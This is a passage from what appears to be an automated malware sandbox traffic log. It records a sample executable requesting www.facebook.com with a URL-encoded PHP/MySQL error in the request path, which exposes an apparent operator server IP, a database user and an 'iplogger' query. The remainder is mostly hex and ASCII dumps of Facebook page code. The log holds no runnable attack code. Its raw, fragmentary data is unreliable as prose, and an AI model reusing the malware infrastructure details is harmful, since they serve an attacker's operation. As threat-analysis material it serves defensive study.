Ascii: ay-rDCncmn_VGc3WUJ2kOSnQ"]},-1],["TrackingConfig",[],{domain:"https://pixel.facebook.com"},325],["WebDevicePerfInfoData",[],{needsFullUpdate:true,needsPartialUpdate:false,shouldLogResourcePerf:false},3977],["WebStorageMonsterLoggingURI",[],{uri:"/ajax/web
2022-10-07 13:59:18 UTC	593	IN	Data Raw: 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 27 64 62 6e 65 77 30 31 27 40 27 Data Ascii: %20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'
2022-10-07 13:59:18 UTC	594	IN	Data Raw: 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 2c 73 65 72 76 65 72 4c 49 44 3a 22 37 31 35 31 37 36 39 37 36 36 38 39 36 37 37 36 39 38 36 22 7d 5d 5d 2c 5b 22 46 61 6c 63 6f 4c 6f 67 67 65 72 54 72 61 6e 73 70 6f 72 74 73 22 2c 22 61 74 74 61 63 68 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 43 6c 69 63 6b 52 65 66 4c 6f 67 67 65 72 22 5d 2c 5b 22 44 65 74 65 63 74 42 72 6f 6b 65 6e 50 72 6f 78 79 43 61 63 68 65 22 2c 22 72 75 6e 22 2c 5b 5d 2c 5b 30 2c 22 63 5f 75 73 65 72 22 5d 5d 2c 5b 22 4e 61 76 69 67 61 74 69 6f 6e 43 6c 69 63 6b 50 6f 69 6e 74 48 61 6e 64 6c 65 72 22 5d 2c 5b 22 57 65 62 44 65 76 69 63 65 50 65 72 66 49 6e 66 6f 4c 6f 67 67 69 6e 67 Data Ascii: l%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E",serverLID:"7151769766896776986"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49712	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 13:59:25 UTC	595	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 13:59:25 UTC	597	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: IqKxJ0nq+U38w433C8SugNr1iODFI5HU5N456LFHBtxB6R1pyojMg+6RvDS6oONnda+yVC0sYtnDLvy9sD3aew== Date: Fri, 07 Oct 2022 13:59:25 GMT Priority: u=3,i Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 13:59:25 UTC	598	IN	Data Raw: 31 61 35 64 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 65 4d 4f 32 74 4a 33 69 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 Data Ascii: 1a5d8<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="eMO2tJ3i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requ
2022-10-07 13:59:25 UTC	598	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 4d 4f 32 74 4a 33 69 22 3e 3c 2f 73 74 Data Ascii: (function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="eMO2tJ3i"></st
2022-10-07 13:59:25 UTC	600	IN	Data Raw: 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c Data Ascii: 8b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><l
2022-10-07 13:59:25 UTC	601	IN	Data Raw: 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 Data Ascii: 2%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886
2022-10-07 13:59:25 UTC	603	IN	Data Raw: 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f Data Ascii: 1'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20colo
2022-10-07 13:59:25 UTC	604	IN	Data Raw: 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 Data Ascii: .css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" rel="sty
2022-10-07 13:59:25 UTC	606	IN	Data Raw: 54 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 45 79 59 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 79 46 77 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 44 31 4d 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 35 4b 45 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 73 42 59 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 Data Ascii: T4_ZQi0sTjSt-RxEyY"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8yFw"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q6D1M"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK65KE"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5xsBY"},"1738486":{"re
2022-10-07 13:59:25 UTC	607	IN	Data Raw: 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d Data Ascii: 00,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom
2022-10-07 13:59:25 UTC	608	IN	Data Raw: 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 6e 75 6c Data Ascii: version":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":nul
2022-10-07 13:59:25 UTC	610	IN	Data Raw: 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 Data Ascii: "SRT_BANZAI_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDID
2022-10-07 13:59:25 UTC	611	IN	Data Raw: 74 2e 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77 77 77 2e 6c 61 6e 64 6d 61 72 6b 73 68 6f 70 73 2e 69 6e 22 2c 22 77 77 77 2e 6e 63 6c 2e 63 6f 6d 22 2c 22 73 30 2e 77 70 2e 63 6f 6d 22 2c 22 77 77 77 2e 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c Data Ascii: t.sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx",
2022-10-07 13:59:25 UTC	613	IN	Data Raw: 5e 29 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75 30 30 30 31 24 33 22 2c 22 5c 2f 5f 5c 75 30 30 30 31 28 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c 5b Data Ascii: ^)","\/_E\/":"([.,!?\\s]\|$)"},"patterns":{"\/\u0001(.)('\|')s\u0001(?:'\|')s(.)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[
2022-10-07 13:59:25 UTC	614	IN	Data Raw: 6b 5c 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 6c 65 78 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f 63 Data Ascii: k\/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/c
2022-10-07 13:59:25 UTC	616	IN	Data Raw: 6e 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 70 70 72 65 67 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a 31 Data Ascii: n\/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1
2022-10-07 13:59:25 UTC	617	IN	Data Raw: 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 22 3a 36 30 Data Ascii: 